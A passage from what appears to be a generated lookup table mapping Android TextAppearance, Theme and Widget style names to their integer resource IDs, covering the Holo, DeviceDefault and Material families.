'TextAppearance.DeviceDefault.Widget.ActionBar.Title.Inverse' : 16974282,
'TextAppearance.DeviceDefault.Widget.ActionMode.Subtitle' : 16974281,
'TextAppearance.DeviceDefault.Widget.ActionMode.Subtitle.Inverse' : 16974285,
'TextAppearance.DeviceDefault.Widget.ActionMode.Title' : 16974280,
'TextAppearance.DeviceDefault.Widget.ActionMode.Title.Inverse' : 16974284,
'TextAppearance.DeviceDefault.Widget.Button' : 16974266,
'TextAppearance.DeviceDefault.Widget.DropDownHint' : 16974271,
'TextAppearance.DeviceDefault.Widget.DropDownItem' : 16974272,
'TextAppearance.DeviceDefault.Widget.EditText' : 16974274,
'TextAppearance.DeviceDefault.Widget.IconMenu.Item' : 16974267,
'TextAppearance.DeviceDefault.Widget.PopupMenu' : 16974275,
'TextAppearance.DeviceDefault.Widget.PopupMenu.Large' : 16974276,
'TextAppearance.DeviceDefault.Widget.PopupMenu.Small' : 16974277,
'TextAppearance.DeviceDefault.Widget.TabWidget' : 16974268,
'TextAppearance.DeviceDefault.Widget.TextView' : 16974269,
'TextAppearance.DeviceDefault.Widget.TextView.PopupMenu' : 16974270,
'TextAppearance.DeviceDefault.Widget.TextView.SpinnerItem' : 16974273,
'TextAppearance.DeviceDefault.WindowTitle' : 16974263,
'TextAppearance.DialogWindowTitle' : 16973889,
'TextAppearance.Holo' : 16974075,
'TextAppearance.Holo.DialogWindowTitle' : 16974103,
'TextAppearance.Holo.Inverse' : 16974076,
'TextAppearance.Holo.Large' : 16974077,
'TextAppearance.Holo.Large.Inverse' : 16974078,
'TextAppearance.Holo.Medium' : 16974079,
'TextAppearance.Holo.Medium.Inverse' : 16974080,
'TextAppearance.Holo.SearchResult.Subtitle' : 16974084,
'TextAppearance.Holo.SearchResult.Title' : 16974083,
'TextAppearance.Holo.Small' : 16974081,
'TextAppearance.Holo.Small.Inverse' : 16974082,
'TextAppearance.Holo.Widget' : 16974085,
'TextAppearance.Holo.Widget.ActionBar.Menu' : 16974112,
'TextAppearance.Holo.Widget.ActionBar.Subtitle' : 16974099,
'TextAppearance.Holo.Widget.ActionBar.Subtitle.Inverse' : 16974109,
'TextAppearance.Holo.Widget.ActionBar.Title' : 16974098,
'TextAppearance.Holo.Widget.ActionBar.Title.Inverse' : 16974108,
'TextAppearance.Holo.Widget.ActionMode.Subtitle' : 16974101,
'TextAppearance.Holo.Widget.ActionMode.Subtitle.Inverse' : 16974111,
'TextAppearance.Holo.Widget.ActionMode.Title' : 16974100,
'TextAppearance.Holo.Widget.ActionMode.Title.Inverse' : 16974110,
'TextAppearance.Holo.Widget.Button' : 16974086,
'TextAppearance.Holo.Widget.DropDownHint' : 16974091,
'TextAppearance.Holo.Widget.DropDownItem' : 16974092,
'TextAppearance.Holo.Widget.EditText' : 16974094,
'TextAppearance.Holo.Widget.IconMenu.Item' : 16974087,
'TextAppearance.Holo.Widget.PopupMenu' : 16974095,
'TextAppearance.Holo.Widget.PopupMenu.Large' : 16974096,
'TextAppearance.Holo.Widget.PopupMenu.Small' : 16974097,
'TextAppearance.Holo.Widget.TabWidget' : 16974088,
'TextAppearance.Holo.Widget.TextView' : 16974089,
'TextAppearance.Holo.Widget.TextView.PopupMenu' : 16974090,
'TextAppearance.Holo.Widget.TextView.SpinnerItem' : 16974093,
'TextAppearance.Holo.WindowTitle' : 16974102,
'TextAppearance.Inverse' : 16973887,
'TextAppearance.Large' : 16973890,
'TextAppearance.Large.Inverse' : 16973891,
'TextAppearance.Material' : 16974317,
'TextAppearance.Material.Body1' : 16974320,
'TextAppearance.Material.Body2' : 16974319,
'TextAppearance.Material.Button' : 16974318,
'TextAppearance.Material.Caption' : 16974321,
'TextAppearance.Material.DialogWindowTitle' : 16974322,
'TextAppearance.Material.Display1' : 16974326,
'TextAppearance.Material.Display2' : 16974325,
'TextAppearance.Material.Display3' : 16974324,
'TextAppearance.Material.Display4' : 16974323,
'TextAppearance.Material.Headline' : 16974327,
'TextAppearance.Material.Inverse' : 16974328,
'TextAppearance.Material.Large' : 16974329,
'TextAppearance.Material.Large.Inverse' : 16974330,
'TextAppearance.Material.Medium' : 16974331,
'TextAppearance.Material.Medium.Inverse' : 16974332,
'TextAppearance.Material.Menu' : 16974333,
'TextAppearance.Material.Notification' : 16974334,
'TextAppearance.Material.Notification.Emphasis' : 16974335,
'TextAppearance.Material.Notification.Info' : 16974336,
'TextAppearance.Material.Notification.Line2' : 16974337,
'TextAppearance.Material.Notification.Time' : 16974338,
'TextAppearance.Material.Notification.Title' : 16974339,
'TextAppearance.Material.SearchResult.Subtitle' : 16974340,
'TextAppearance.Material.SearchResult.Title' : 16974341,
'TextAppearance.Material.Small' : 16974342,
'TextAppearance.Material.Small.Inverse' : 16974343,
'TextAppearance.Material.Subhead' : 16974344,
'TextAppearance.Material.Title' : 16974345,
'TextAppearance.Material.Widget' : 16974347,
'TextAppearance.Material.Widget.ActionBar.Menu' : 16974348,
'TextAppearance.Material.Widget.ActionBar.Subtitle' : 16974349,
'TextAppearance.Material.Widget.ActionBar.Subtitle.Inverse' : 16974350,
'TextAppearance.Material.Widget.ActionBar.Title' : 16974351,
'TextAppearance.Material.Widget.ActionBar.Title.Inverse' : 16974352,
'TextAppearance.Material.Widget.ActionMode.Subtitle' : 16974353,
'TextAppearance.Material.Widget.ActionMode.Subtitle.Inverse' : 16974354,
'TextAppearance.Material.Widget.ActionMode.Title' : 16974355,
'TextAppearance.Material.Widget.ActionMode.Title.Inverse' : 16974356,
'TextAppearance.Material.Widget.Button' : 16974357,
'TextAppearance.Material.Widget.DropDownHint' : 16974358,
'TextAppearance.Material.Widget.DropDownItem' : 16974359,
'TextAppearance.Material.Widget.EditText' : 16974360,
'TextAppearance.Material.Widget.IconMenu.Item' : 16974361,
'TextAppearance.Material.Widget.PopupMenu' : 16974362,
'TextAppearance.Material.Widget.PopupMenu.Large' : 16974363,
'TextAppearance.Material.Widget.PopupMenu.Small' : 16974364,
'TextAppearance.Material.Widget.TabWidget' : 16974365,
'TextAppearance.Material.Widget.TextView' : 16974366,
'TextAppearance.Material.Widget.TextView.PopupMenu' : 16974367,
'TextAppearance.Material.Widget.TextView.SpinnerItem' : 16974368,
'TextAppearance.Material.Widget.Toolbar.Subtitle' : 16974369,
'TextAppearance.Material.Widget.Toolbar.Title' : 16974370,
'TextAppearance.Material.WindowTitle' : 16974346,
'TextAppearance.Medium' : 16973892,
'TextAppearance.Medium.Inverse' : 16973893,
'TextAppearance.Small' : 16973894,
'TextAppearance.Small.Inverse' : 16973895,
'TextAppearance.StatusBar.EventContent' : 16973927,
'TextAppearance.StatusBar.EventContent.Title' : 16973928,
'TextAppearance.StatusBar.Icon' : 16973926,
'TextAppearance.StatusBar.Title' : 16973925,
'TextAppearance.SuggestionHighlight' : 16974104,
'TextAppearance.Theme' : 16973888,
'TextAppearance.Theme.Dialog' : 16973896,
'TextAppearance.Widget' : 16973897,
'TextAppearance.Widget.Button' : 16973898,
'TextAppearance.Widget.DropDownHint' : 16973904,
'TextAppearance.Widget.DropDownItem' : 16973905,
'TextAppearance.Widget.EditText' : 16973900,
'TextAppearance.Widget.IconMenu.Item' : 16973899,
'TextAppearance.Widget.PopupMenu.Large' : 16973952,
'TextAppearance.Widget.PopupMenu.Small' : 16973953,
'TextAppearance.Widget.TabWidget' : 16973901,
'TextAppearance.Widget.TextView' : 16973902,
'TextAppearance.Widget.TextView.PopupMenu' : 16973903,
'TextAppearance.Widget.TextView.SpinnerItem' : 16973906,
'TextAppearance.WindowTitle' : 16973907,
'Theme' : 16973829,
'ThemeOverlay' : 16974407,
'ThemeOverlay.Material' : 16974408,
'ThemeOverlay.Material.ActionBar' : 16974409,
'ThemeOverlay.Material.Dark' : 16974411,
'ThemeOverlay.Material.Dark.ActionBar' : 16974412,
'ThemeOverlay.Material.Light' : 16974410,
'Theme.Black' : 16973832,
'Theme.Black.NoTitleBar' : 16973833,
'Theme.Black.NoTitleBar.Fullscreen' : 16973834,
'Theme.DeviceDefault' : 16974120,
'Theme.DeviceDefault.Dialog' : 16974126,
'Theme.DeviceDefault.DialogWhenLarge' : 16974134,
'Theme.DeviceDefault.DialogWhenLarge.NoActionBar' : 16974135,
'Theme.DeviceDefault.Dialog.MinWidth' : 16974127,
'Theme.DeviceDefault.Dialog.NoActionBar' : 16974128,
'Theme.DeviceDefault.Dialog.NoActionBar.MinWidth' : 16974129,
'Theme.DeviceDefault.InputMethod' : 16974142,
'Theme.DeviceDefault.Light' : 16974123,
'Theme.DeviceDefault.Light.DarkActionBar' : 16974143,
'Theme.DeviceDefault.Light.Dialog' : 16974130,
'Theme.DeviceDefault.Light.DialogWhenLarge' : 16974136,
'Theme.DeviceDefault.Light.DialogWhenLarge.NoActionBar' : 16974137,
'Theme.DeviceDefault.Light.Dialog.MinWidth' : 16974131,
'Theme.DeviceDefault.Light.Dialog.NoActionBar' : 16974132,
'Theme.DeviceDefault.Light.Dialog.NoActionBar.MinWidth' : 16974133,
'Theme.DeviceDefault.Light.NoActionBar' : 16974124,
'Theme.DeviceDefault.Light.NoActionBar.Fullscreen' : 16974125,
'Theme.DeviceDefault.Light.NoActionBar.Overscan' : 16974304,
'Theme.DeviceDefault.Light.NoActionBar.TranslucentDecor' : 16974308,
'Theme.DeviceDefault.Light.Panel' : 16974139,
'Theme.DeviceDefault.NoActionBar' : 16974121,
'Theme.DeviceDefault.NoActionBar.Fullscreen' : 16974122,
'Theme.DeviceDefault.NoActionBar.Overscan' : 16974303,
'Theme.DeviceDefault.NoActionBar.TranslucentDecor' : 16974307,
'Theme.DeviceDefault.Panel' : 16974138,
'Theme.DeviceDefault.Settings' : 16974371,
'Theme.DeviceDefault.Wallpaper' : 16974140,
'Theme.DeviceDefault.Wallpaper.NoTitleBar' : 16974141,
'Theme.Dialog' : 16973835,
'Theme.Holo' : 16973931,
'Theme.Holo.Dialog' : 16973935,
'Theme.Holo.DialogWhenLarge' : 16973943,
'Theme.Holo.DialogWhenLarge.NoActionBar' : 16973944,
'Theme.Holo.Dialog.MinWidth' : 16973936,
'Theme.Holo.Dialog.NoActionBar' : 16973937,
'Theme.Holo.Dialog.NoActionBar.MinWidth' : 16973938,
'Theme.Holo.InputMethod' : 16973951,
'Theme.Holo.Light' : 16973934,
'Theme.Holo.Light.DarkActionBar' : 16974105,
'Theme.Holo.Light.Dialog' : 16973939,
'Theme.Holo.Light.DialogWhenLarge' : 16973945,
'Theme.Holo.Light.DialogWhenLarge.NoActionBar' : 16973946,
'Theme.Holo.Light.Dialog.MinWidth' : 16973940,
'Theme.Holo.Light.Dialog.NoActionBar' : 16973941,
'Theme.Holo.Light.Dialog.NoActionBar.MinWidth' : 16973942,
'Theme.Holo.Light.NoActionBar' : 16974064,
'Theme.Holo.Light.NoActionBar.Fullscreen' : 16974065,
'Theme.Holo.Light.NoActionBar.Overscan' : 16974302,
'Theme.Holo.Light.NoActionBar.TranslucentDecor' : 16974306,
'Theme.Holo.Light.Panel' : 16973948,
'Theme.Holo.NoActionBar' : 16973932,
'Theme.Holo.NoActionBar.Fullscreen' : 16973933,
'Theme.Holo.NoActionBar.Overscan' : 16974301,
'Theme.Holo.NoActionBar.TranslucentDecor' : 16974305,
'Theme.Holo.Panel' : 16973947,
'Theme.Holo.Wallpaper' : 16973949,
'Theme.Holo.Wallpaper.NoTitleBar' : 16973950,
'Theme.InputMethod' : 16973908,
'Theme.Light' : 16973836,
'Theme.Light.NoTitleBar' : 16973837,
'Theme.Light.NoTitleBar.Fullscreen' : 16973838,
'Theme.Light.Panel' : 16973914,
'Theme.Light.WallpaperSettings' : 16973922,
'Theme.Material' : 16974372,
'Theme.Material.Dialog' : 16974373,
'Theme.Material.DialogWhenLarge' : 16974379,
'Theme.Material.DialogWhenLarge.NoActionBar' : 16974380,
'Theme.Material.Dialog.Alert' : 16974374,
'Theme.Material.Dialog.MinWidth' : 16974375,
'Theme.Material.Dialog.NoActionBar' : 16974376,
'Theme.Material.Dialog.NoActionBar.MinWidth' : 16974377,
'Theme.Material.Dialog.Presentation' : 16974378,
'Theme.Material.InputMethod' : 16974381,
'Theme.Material.Light' : 16974391,
'Theme.Material.Light.DarkActionBar' : 16974392,
'Theme.Material.Light.Dialog' : 16974393,
'Theme.Material.Light.DialogWhenLarge' : 16974399,
'Theme.Material.Light.DialogWhenLarge.NoActionBar' : 16974400,
'Theme.Material.Light.Dialog.Alert' : 16974394,
'Theme.Material.Light.Dialog.MinWidth' : 16974395,
'Theme.Material.Light.Dialog.NoActionBar' : 16974396,
'Theme.Material.Light.Dialog.NoActionBar.MinWidth' : 16974397,
'Theme.Material.Light.Dialog.Presentation' : 16974398,
'Theme.Material.Light.NoActionBar' : 16974401,
'Theme.Material.Light.NoActionBar.Fullscreen' : 16974402,
'Theme.Material.Light.NoActionBar.Overscan' : 16974403,
'Theme.Material.Light.NoActionBar.TranslucentDecor' : 16974404,
'Theme.Material.Light.Panel' : 16974405,
'Theme.Material.Light.Voice' : 16974406,
'Theme.Material.NoActionBar' : 16974382,
'Theme.Material.NoActionBar.Fullscreen' : 16974383,
'Theme.Material.NoActionBar.Overscan' : 16974384,
'Theme.Material.NoActionBar.TranslucentDecor' : 16974385,
'Theme.Material.Panel' : 16974386,
'Theme.Material.Settings' : 16974387,
'Theme.Material.Voice' : 16974388,
'Theme.Material.Wallpaper' : 16974389,
'Theme.Material.Wallpaper.NoTitleBar' : 16974390,
'Theme.NoDisplay' : 16973909,
'Theme.NoTitleBar' : 16973830,
'Theme.NoTitleBar.Fullscreen' : 16973831,
'Theme.NoTitleBar.OverlayActionModes' : 16973930,
'Theme.Panel' : 16973913,
'Theme.Translucent' : 16973839,
'Theme.Translucent.NoTitleBar' : 16973840,
'Theme.Translucent.NoTitleBar.Fullscreen' : 16973841,
'Theme.Wallpaper' : 16973918,
'Theme.WallpaperSettings' : 16973921,
'Theme.Wallpaper.NoTitleBar' : 16973919,
'Theme.Wallpaper.NoTitleBar.Fullscreen' : 16973920,
'Theme.WithActionBar' : 16973929,
'Widget' : 16973842,
'Widget.AbsListView' : 16973843,
'Widget.ActionBar' : 16973954,
'Widget.ActionBar.TabBar' : 16974068,
'Widget.ActionBar.TabText' : 16974067,
'Widget.ActionBar.TabView' : 16974066,
'Widget.ActionButton' : 16973956,
'Widget.ActionButton.CloseMode' : 16973960,
'Widget.ActionButton.Overflow' : 16973959,
'Widget.AutoCompleteTextView' : 16973863,
'Widget.Button' : 16973844,
'Widget.Button.Inset' : 16973845,
'Widget.Button.Small' : 16973846,
'Widget.Button.Toggle' : 16973847,
'Widget.CalendarView' : 16974059,
'Widget.CompoundButton' : 16973848,
'Widget.CompoundButton.CheckBox' : 16973849,
'Widget.CompoundButton.RadioButton' : 16973850,
'Widget.CompoundButton.Star' : 16973851,
'Widget.DatePicker' : 16974062,
'Widget.DeviceDefault' : 16974144,
'Widget.DeviceDefault.ActionBar' : 16974187,
'Widget.DeviceDefault.ActionBar.Solid' : 16974195,
'Widget.DeviceDefault.ActionBar.TabBar' : 16974194,
'Widget.DeviceDefault.ActionBar.TabText' : 16974193,
'Widget.DeviceDefault.ActionBar.TabView' : 16974192,
'Widget.DeviceDefault.ActionButton' : 16974182,
'Widget.DeviceDefault.ActionButton.CloseMode' : 16974186,
'Widget.DeviceDefault.ActionButton.Overflow' : 16974183,
'Widget.DeviceDefault.ActionButton.TextButton' : 16974184,
'Widget.DeviceDefault.ActionMode' : 16974185,
'Widget.DeviceDefault.AutoCompleteTextView' : 16974151,
'Widget.DeviceDefault.Button' : 16974145,
'Widget.DeviceDefault.Button.Borderless' : 16974188,
'Widget.DeviceDefault.Button.Borderless.Small' : 16974149,
'Widget.DeviceDefault.Button.Inset' : 16974147,
'Widget.DeviceDefault.Button.Small' : 16974146,
'Widget.DeviceDefault.Button.Toggle' : 16974148,
'Widget.DeviceDefault.CalendarView' : 16974190,
'Widget.DeviceDefault.CheckedTextView' : 16974299,
'Widget.DeviceDefault.CompoundButton.CheckBox' : 16974152,
'Widget.DeviceDefault.CompoundButton.RadioButton' : 16974169,
'Widget.DeviceDefault.CompoundButton.Star' : 16974173,
'Widget.DeviceDefault.DatePicker' : 16974191,
'Widget.DeviceDefault.DropDownItem' : 16974177,
'Widget.DeviceDefault.DropDownItem.Spinner' : 16974178,
'Widget.DeviceDefault.EditText' : 16974154,
'Widget.DeviceDefault.ExpandableListView' : 16974155,
'Widget.DeviceDefault.FastScroll' : 16974313,
'Widget.DeviceDefault.GridView' : 16974156,
'Widget.DeviceDefault.HorizontalScrollView' : 16974171,
'Widget.DeviceDefault.ImageButton' : 16974157,
'Widget.DeviceDefault.Light' : 16974196,
'Widget.DeviceDefault.Light.ActionBar' : 16974243,
'Widget.DeviceDefault.Light.ActionBar.Solid' : 16974247,
'Widget.DeviceDefault.Light.ActionBar.Solid.Inverse' : 16974248,
'Widget.DeviceDefault.Light.ActionBar.TabBar' : 16974246,
'Widget.DeviceDefault.Light.ActionBar.TabBar.Inverse' : 16974249,
'Widget.DeviceDefault.Light.ActionBar.TabText' : 16974245,
'Widget.DeviceDefault.Light.ActionBar.TabText.Inverse' : 16974251,
'Widget.DeviceDefault.Light.ActionBar.TabView' : 16974244,
'Widget.DeviceDefault.Light.ActionBar.TabView.Inverse' : 16974250,
'Widget.DeviceDefault.Light.ActionButton' : 16974239,
'Widget.DeviceDefault.Light.ActionButton.CloseMode' : 16974242,
'Widget.DeviceDefault.Light.ActionButton.Overflow' : 16974240,
'Widget.DeviceDefault.Light.ActionMode' : 16974241,
'Widget.DeviceDefault.Light.ActionMode.Inverse' : 16974252,
'Widget.DeviceDefault.Light.AutoCompleteTextView' : 16974203,
'Widget.DeviceDefault.Light.Button' : 16974197,
'Widget.DeviceDefault.Light.Button.Borderless.Small' : 16974201,
'Widget.DeviceDefault.Light.Button.Inset' : 16974199,
'Widget.DeviceDefault.Light.Button.Small' : 16974198,
'Widget.DeviceDefault.Light.Button.Toggle' : 16974200,
'Widget.DeviceDefault.Light.CalendarView' : 16974238,
'Widget.DeviceDefault.Light.CheckedTextView' : 16974300,
'Widget.DeviceDefault.Light.CompoundButton.CheckBox' : 16974204,
'Widget.DeviceDefault.Light.CompoundButton.RadioButton' : 16974224,
'Widget.DeviceDefault.Light.CompoundButton.Star' : 16974228,
'Widget.DeviceDefault.Light.DropDownItem' : 16974232,
'Widget.DeviceDefault.Light.DropDownItem.Spinner' : 16974233,
'Widget.DeviceDefault.Light.EditText' : 16974206,
'Widget.DeviceDefault.Light.ExpandableListView' : 16974207,
'Widget.DeviceDefault.Light.FastScroll' : 16974315,
'Widget.DeviceDefault.Light.GridView' : 16974208,
'Widget.DeviceDefault.Light.HorizontalScrollView' : 16974226,
'Widget.DeviceDefault.Light.ImageButton' : 16974209,
'Widget.DeviceDefault.Light.ListPopupWindow' : 16974235,
'Widget.DeviceDefault.Light.ListView' : 16974210,
'Widget.DeviceDefault.Light.ListView.DropDown' : 16974205,
'Widget.DeviceDefault.Light.MediaRouteButton' : 16974296,
'Widget.DeviceDefault.Light.PopupMenu' : 16974236,
'Widget.DeviceDefault.Light.PopupWindow' : 16974211,
'Widget.DeviceDefault.Light.ProgressBar' : 16974212,
'Widget.DeviceDefault.Light.ProgressBar.Horizontal' : 16974213,
'Widget.DeviceDefault.Light.ProgressBar.Inverse' : 16974217,
'Widget.DeviceDefault.Light.ProgressBar.Large' : 16974216,
'Widget.DeviceDefault.Light.ProgressBar.Large.Inverse' : 16974219,
'Widget.DeviceDefault.Light.ProgressBar.Small' : 16974214,
'Widget.DeviceDefault.Light.ProgressBar.Small.Inverse' : 16974218,
'Widget.DeviceDefault.Light.ProgressBar.Small.Title' : 16974215,
'Widget.DeviceDefault.Light.RatingBar' : 16974221,
'Widget.DeviceDefault.Light.RatingBar.Indicator' : 16974222,
'Widget.DeviceDefault.Light.RatingBar.Small' : 16974223,
'Widget.DeviceDefault.Light.ScrollView' : 16974225,
'Widget.DeviceDefault.Light.SeekBar' : 16974220,
'Widget.DeviceDefault.Light.Spinner' : 16974227,
'Widget.DeviceDefault.Light.StackView' : 16974316,
'Widget.DeviceDefault.Light.Tab' : 16974237,
'Widget.DeviceDefault.Light.TabWidget' : 16974229,
'Widget.DeviceDefault.Light.TextView' : 16974202,
'Widget.DeviceDefault.Light.TextView.SpinnerItem' : 16974234,
'Widget.DeviceDefault.Light.WebTextView' : 16974230,
'Widget.DeviceDefault.Light.WebView' : 16974231,
'Widget.DeviceDefault.ListPopupWindow' : 16974180,
'Widget.DeviceDefault.ListView' : 16974158,
'Widget.DeviceDefault.ListView.DropDown' : 16974153,
'Widget.DeviceDefault.MediaRouteButton' : 16974295,
'Widget.DeviceDefault.PopupMenu' : 16974181,
'Widget.DeviceDefault.PopupWindow' : 16974159,
'Widget.DeviceDefault.ProgressBar' : 16974160,
'Widget.DeviceDefault.ProgressBar.Horizontal' : 16974161,
'Widget.DeviceDefault.ProgressBar.Large' : 16974164,
'Widget.DeviceDefault.ProgressBar.Small' : 16974162,
'Widget.DeviceDefault.ProgressBar.Small.Title' : 16974163,
'Widget.DeviceDefault.RatingBar' : 16974166,
'Widget.DeviceDefault.RatingBar.Indicator' : 16974167,
'Widget.DeviceDefault.RatingBar.Small' : 16974168,
'Widget.DeviceDefault.ScrollView' : 16974170,
'Widget.DeviceDefault.SeekBar' : 16974165,
'Widget.DeviceDefault.Spinner' : 16974172,
'Widget.DeviceDefault.StackView' : 16974314,
'Widget.DeviceDefault.Tab' : 16974189,
'Widget.DeviceDefault.TabWidget' : 16974174,
'Widget.DeviceDefault.TextView' : 16974150,
'Widget.DeviceDefault.TextView.SpinnerItem' : 16974179,
'Widget.DeviceDefault.WebTextView' : 16974175,
'Widget.DeviceDefault.WebView' : 16974176,
'Widget.DropDownItem' : 16973867,
'Widget.DropDownItem.Spinner' : 16973868,
'Widget.EditText' : 16973859,
'Widget.ExpandableListView' : 16973860,
'Widget.FastScroll' : 16974309,
'Widget.FragmentBreadCrumbs' : 16973961,
'Widget.Gallery' : 16973877,
'Widget.GridView' : 16973874,
'Widget.Holo' : 16973962,
'Widget.Holo.ActionBar' : 16974004,
'Widget.Holo.ActionBar.Solid' : 16974113,
'Widget.Holo.ActionBar.TabBar' : 16974071,
'Widget.Holo.ActionBar.TabText' : 16974070,
'Widget.Holo.ActionBar.TabView' : 16974069,
'Widget.Holo.ActionButton' : 16973999,
'Widget.Holo.ActionButton.CloseMode' : 16974003,
'Widget.Holo.ActionButton.Overflow' : 16974000,
'Widget.Holo.ActionButton.TextButton' : 16974001,
'Widget.Holo.ActionMode' : 16974002,
'Widget.Holo.AutoCompleteTextView' : 16973968,
'Widget.Holo.Button' : 16973963,
'Widget.Holo.Button.Borderless' : 16974050,
'Widget.Holo.Button.Borderless.Small' : 16974106,
'Widget.Holo.Button.Inset' : 16973965,
'Widget.Holo.Button.Small' : 16973964,
'Widget.Holo.Button.Toggle' : 16973966,
'Widget.Holo.CalendarView' : 16974060,
'Widget.Holo.CheckedTextView' : 16974297,
'Widget.Holo.CompoundButton.CheckBox' : 16973969,
'Widget.Holo.CompoundButton.RadioButton' : 16973986,
'Widget.Holo.CompoundButton.Star' : 16973990,
'Widget.Holo.DatePicker' : 16974063,
'Widget.Holo.DropDownItem' : 16973994,
'Widget.Holo.DropDownItem.Spinner' : 16973995,
'Widget.Holo.EditText' : 16973971,
'Widget.Holo.ExpandableListView' : 16973972,
'Widget.Holo.GridView' : 16973973,
'Widget.Holo.HorizontalScrollView' : 16973988,
'Widget.Holo.ImageButton' : 16973974,
'Widget.Holo.Light' : 16974005,
'Widget.Holo.Light.ActionBar' : 16974049,
'Widget.Holo.Light.ActionBar.Solid' : 16974114,
'Widget.Holo.Light.ActionBar.Solid.Inverse' : 16974115,
'Widget.Holo.Light.ActionBar.TabBar' : 16974074,
'Widget.Holo.Light.ActionBar.TabBar.Inverse' : 16974116,
'Widget.Holo.Light.ActionBar.TabText' : 16974073,
'Widget.Holo.Light.ActionBar.TabText.Inverse' : 16974118,
'Widget.Holo.Light.ActionBar.TabView' : 16974072,
'Widget.Holo.Light.ActionBar.TabView.Inverse' : 16974117,
'Widget.Holo.Light.ActionButton' : 16974045,
'Widget.Holo.Light.ActionButton.CloseMode' : 16974048,
'Widget.Holo.Light.ActionButton.Overflow' : 16974046,
'Widget.Holo.Light.ActionMode' : 16974047,
'Widget.Holo.Light.ActionMode.Inverse' : 16974119,
'Widget.Holo.Light.AutoCompleteTextView' : 16974011,
'Widget.Holo.Light.Button' : 16974006,
'Widget.Holo.Light.Button.Borderless.Small' : 16974107,
'Widget.Holo.Light.Button.Inset' : 16974008,
'Widget.Holo.Light.Button.Small' : 16974007,
'Widget.Holo.Light.Button.Toggle' : 16974009,
'Widget.Holo.Light.CalendarView' : 16974061,
'Widget.Holo.Light.CheckedTextView' : 16974298,
'Widget.Holo.Light.CompoundButton.CheckBox' : 16974012,
'Widget.Holo.Light.CompoundButton.RadioButton' : 16974032,
'Widget.Holo.Light.CompoundButton.Star' : 16974036,
'Widget.Holo.Light.DropDownItem' : 16974040,
'Widget.Holo.Light.DropDownItem.Spinner' : 16974041,
'Widget.Holo.Light.EditText' : 16974014,
'Widget.Holo.Light.ExpandableListView' : 16974015,
'Widget.Holo.Light.GridView' : 16974016,
'Widget.Holo.Light.HorizontalScrollView' : 16974034,
'Widget.Holo.Light.ImageButton' : 16974017,
'Widget.Holo.Light.ListPopupWindow' : 16974043,
'Widget.Holo.Light.ListView' : 16974018,
'Widget.Holo.Light.ListView.DropDown' : 16974013,
'Widget.Holo.Light.MediaRouteButton' : 16974294,
'Widget.Holo.Light.PopupMenu' : 16974044,
'Widget.Holo.Light.PopupWindow' : 16974019,
'Widget.Holo.Light.ProgressBar' : 16974020,
'Widget.Holo.Light.ProgressBar.Horizontal' : 16974021,
'Widget.Holo.Light.ProgressBar.Inverse' : 16974025,
'Widget.Holo.Light.ProgressBar.Large' : 16974024,
'Widget.Holo.Light.ProgressBar.Large.Inverse' : 16974027,
'Widget.Holo.Light.ProgressBar.Small' : 16974022,
'Widget.Holo.Light.ProgressBar.Small.Inverse' : 16974026,
'Widget.Holo.Light.ProgressBar.Small.Title' : 16974023,
'Widget.Holo.Light.RatingBar' : 16974029,
'Widget.Holo.Light.RatingBar.Indicator' : 16974030,
'Widget.Holo.Light.RatingBar.Small' : 16974031,
'Widget.Holo.Light.ScrollView' : 16974033,
'Widget.Holo.Light.SeekBar' : 16974028,
'Widget.Holo.Light.Spinner' : 16974035,
'Widget.Holo.Light.Tab' : 16974052,
'Widget.Holo.Light.TabWidget' : 16974037,
'Widget.Holo.Light.TextView' : 16974010,
'Widget.Holo.Light.TextView.SpinnerItem' : 16974042,
'Widget.Holo.Light.WebTextView' : 16974038,
'Widget.Holo.Light.WebView' : 16974039,
'Widget.Holo.ListPopupWindow' : 16973997,
'Widget.Holo.ListView' : 16973975,
'Widget.Holo.ListView.DropDown' : 16973970,
'Widget.Holo.MediaRouteButton' : 16974293,
'Widget.Holo.PopupMenu' : 16973998,
'Widget.Holo.PopupWindow' : 16973976,
'Widget.Holo.ProgressBar' : 16973977,
'Widget.Holo.ProgressBar.Horizontal' : 16973978,
'Widget.Holo.ProgressBar.Large' : 16973981,
'Widget.Holo.ProgressBar.Small' : 16973979,
'Widget.Holo.ProgressBar.Small.Title' : 16973980,
'Widget.Holo.RatingBar' : 16973983,
'Widget.Holo.RatingBar.Indicator' : 16973984,
'Widget.Holo.RatingBar.Small' : 16973985,
'Widget.Holo.ScrollView' : 16973987,
'Widget.Holo.SeekBar' : 16973982,
'Widget.Holo.Spinner' : 16973989,
'Widget.Holo.Tab' : 16974051,
'Widget.Holo.TabWidget' : 16973991,
'Widget.Holo.TextView' : 16973967,
'Widget.Holo.TextView.SpinnerItem' : 16973996,
'Widget.Holo.WebTextView' : 16973992,
'Widget.Holo.WebView' : 16973993,
'Widget.ImageButton' : 16973862,
'Widget.ImageWell' : 16973861,
'Widget.KeyboardView' : 16973911,
'Widget.ListPopupWindow' : 16973957,
'Widget.ListView' : 16973870,
'Widget.ListView.DropDown' : 16973872,
'Widget.ListView.Menu' : 16973873,
'Widget.ListView.White' : 16973871,
'Widget.Material' : 16974413,
'Widget.Material.ActionBar' : 16974414,
'Widget.Material.ActionBar.Solid' : 16974415,
'Widget.Material.ActionBar.TabBar' : 16974416,
'Widget.Material.ActionBar.TabText' : 16974417,
'Widget.Material.ActionBar.TabView' : 16974418,
'Widget.Material.ActionButton' : 16974419,
'Widget.Material.ActionButton.CloseMode' : 16974420,
'Widget.Material.ActionButton.Overflow' : 16974421,
'Widget.Material.ActionMode' : 16974422,
'Widget.Material.AutoCompleteTextView' : 16974423,
'Widget.Material.Button' : 16974424,
'Widget.Material.ButtonBar' : 16974431,
'Widget.Material.ButtonBar.AlertDialog' : 16974432,
'Widget.Material.Button.Borderless' : 16974425,
'Widget.Material.Button.Borderless.Colored' : 16974426,
'Widget.Material.Button.Borderless.Small' : 16974427,
'Widget.Material.Button.Inset' : 16974428,
'Widget.Material.Button.Small' : 16974429,
'Widget.Material.Button.Toggle' : 16974430,
'Widget.Material.CalendarView' : 16974433,
'Widget.Material.CheckedTextView' : 16974434,
'Widget.Material.CompoundButton.CheckBox' : 16974435,
'Widget.Material.CompoundButton.RadioButton' : 16974436,
'Widget.Material.CompoundButton.Star' : 16974437,
'Widget.Material.DatePicker' : 16974438,
'Widget.Material.DropDownItem' : 16974439,
'Widget.Material.DropDownItem.Spinner' : 16974440,
'Widget.Material.EditText' : 16974441,
'Widget.Material.ExpandableListView' : 16974442,
'Widget.Material.FastScroll' : 16974443,
'Widget.Material.GridView' : 16974444,
'Widget.Material.HorizontalScrollView' : 16974445,
'Widget.Material.ImageButton' : 16974446,
